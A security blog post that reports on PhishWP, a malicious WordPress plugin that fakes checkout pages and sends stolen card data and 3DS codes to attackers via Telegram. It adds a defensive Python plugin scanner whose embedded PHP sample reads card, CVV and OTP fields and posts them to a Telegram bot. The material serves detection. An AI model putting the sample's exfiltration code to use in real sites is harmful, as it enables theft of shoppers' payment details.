Malicious WordPress Plugin Assists in Phishing Attacks

Stu Sjouwerman | Jan 9, 2025

Researchers at SlashNext warn that cybercriminals are using a WordPress plugin called “PhishWP” to spoof payment pages and steal financial information.

The spoofed pages are designed to steal payment card numbers, expiration dates, CVVs, and billing addresses. The plugin can also intercept one-time passwords generated to secure the transactions.

The stolen data is immediately sent to the crooks via Telegram as soon as the victim hits “enter” on the phishing page.

“Attackers can either compromise legitimate WordPress websites or set up fraudulent ones to install it,” SlashNext explains. “After configuring the plugin to mimic a payment gateway, unsuspecting users are lured into entering their payment details.

The plugin collects this information and sends it directly to attackers, often in real time. PhishWP also uses advanced tricks, like stealing the special OTP sent during a 3D Secure (3DS) check during the checkout process. 3DS is a safety measure that sends a short code to your phone or email to prove that you’re the actual cardholder. By grabbing this code, attackers can pass themselves off as you, making their fake transactions look completely real.”

The researchers outline the attack flow as follows:

  • Set up on a WordPress site: Attackers either break into a trusted WordPress site or create their own fake one
  • Copy a real payment service: They use PhishWP to make checkout pages look just like a real payment processor (like Stripe), adjusting the design and language so nothing seems off about the branding, fields, or language
  • Lure victims in: Victims arrive at the site through carefully planned phishing emails, social media ads, or sneaky search results. Everything looks normal, so they enter their payment and personal details without a second thought
  • Steal the data: PhishWP scoops up all the sensitive information—credit card numbers, addresses, even special security codes—and instantly sends it to the attacker, often via Telegram
  • Cover the tracks: The victim then receives a fake confirmation email, making them believe their purchase went through. Meanwhile, the attacker uses or sells the stolen info in secret online markets
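The attack flow above comes down to two code-level traits a site owner can look for when reviewing an unfamiliar plugin: harvesting of card and OTP fields from request data, and real-time exfiltration to a Telegram bot. The following scanner is an added example written for this article, not SlashNext's or PhishWP's code; the indicator patterns are assumptions derived from the behaviour described here, and the sample PHP is constructed.

```python
"""Heuristic review of WordPress plugin source for the traits the PhishWP
report describes: reading payment-card and OTP fields from POST data and
shipping them to a Telegram bot. The regexes are assumed indicators, not
PhishWP signatures."""
import re
from pathlib import Path

# Telegram Bot API endpoint used for real-time exfiltration.
TELEGRAM_RE = re.compile(r"api\.telegram\.org/bot[^\s'\"]*", re.IGNORECASE)
# POST parameters a spoofed checkout page would harvest.
CARD_FIELD_RE = re.compile(
    r"\$_(?:POST|REQUEST)\[\s*['\"](card(?:_?number)?|cc_?num|cvv|cvc|exp(?:iry|_?date)?)['\"]",
    re.IGNORECASE)
OTP_FIELD_RE = re.compile(
    r"\$_(?:POST|REQUEST)\[\s*['\"](otp|one_?time|3ds_?code|verification_?code)['\"]",
    re.IGNORECASE)

def scan_source(src: str) -> dict:
    """Return which indicator families appear in one plugin source file."""
    return {
        "telegram_exfil": bool(TELEGRAM_RE.search(src)),
        "card_fields": sorted({m.group(1).lower() for m in CARD_FIELD_RE.finditer(src)}),
        "otp_fields": sorted({m.group(1).lower() for m in OTP_FIELD_RE.finditer(src)}),
    }

def verdict(findings: dict) -> str:
    """Card/OTP harvesting combined with Telegram exfil is the pattern described."""
    harvests = bool(findings["card_fields"] or findings["otp_fields"])
    if harvests and findings["telegram_exfil"]:
        return "high"
    if harvests or findings["telegram_exfil"]:
        return "medium"
    return "clean"

def scan_plugin_dir(root) -> dict:
    """Scan every PHP file under a plugin directory; returns path -> verdict."""
    return {str(p): verdict(scan_source(p.read_text(errors="ignore")))
            for p in Path(root).rglob("*.php")}

# Constructed sample mimicking the described behaviour (not real PhishWP code);
# <TOKEN> and <ID> are placeholders.
SAMPLE_PLUGIN = r"""<?php
$card = $_POST['card_number']; $cvv = $_POST['cvv']; $otp = $_POST['otp'];
$msg = urlencode("$card|$cvv|$otp");
file_get_contents("https://api.telegram.org/bot<TOKEN>/sendMessage?chat_id=<ID>&text=$msg");
"""

if __name__ == "__main__":
    findings = scan_source(SAMPLE_PLUGIN)
    print(findings, verdict(findings))
```

Run `scan_plugin_dir("wp-content/plugins")` on a site to triage plugins; a "high" verdict warrants manual review of the flagged file rather than automatic removal, since legitimate plugins may handle card fields.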

KnowBe4 empowers your workforce to make smarter security decisions every day. Over 70,000 organizations worldwide trust the KnowBe4 platform to strengthen their security culture and reduce human risk.

SlashNext has the story.
